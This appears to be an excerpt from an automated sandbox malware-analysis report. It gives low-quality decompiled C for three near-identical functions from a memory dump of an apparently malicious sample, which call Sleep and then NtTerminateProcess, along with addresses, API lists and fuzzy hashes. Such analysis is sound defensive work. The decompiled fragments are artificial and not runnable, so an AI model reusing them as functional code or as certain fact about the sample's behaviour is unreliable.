                      • API String ID: 417527130-0
                      • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                      • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("out 0x95, eax");
                      				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}







                      0x00401822
                      0x00401822
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.501563110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_hdgaecu.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                      • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("sbb ebx, ebp");
                      				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401826
                      0x00401826
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.501563110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_hdgaecu.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                      • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 20%
                      			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t10;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t22;
                      				void* _t25;
                      
                      				_t26 = __eflags;
                      				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t19 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				if(_t13 != 0) {
                      					_push( *((intOrPtr*)(_t25 + 0x14)));
                      					_push( *((intOrPtr*)(_t25 - 4)));
                      					_push(_t13);
                      					_push(_t19); // executed
                      					L00401455(0x60, _t22, __edi); // executed
                      				}
                      				 *_t19(0xffffffff, 0); // executed
                      				_t19 = _t19 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401834
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.501563110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_hdgaecu.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                      • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                      Uniqueness

                      Uniqueness Score: -1.00%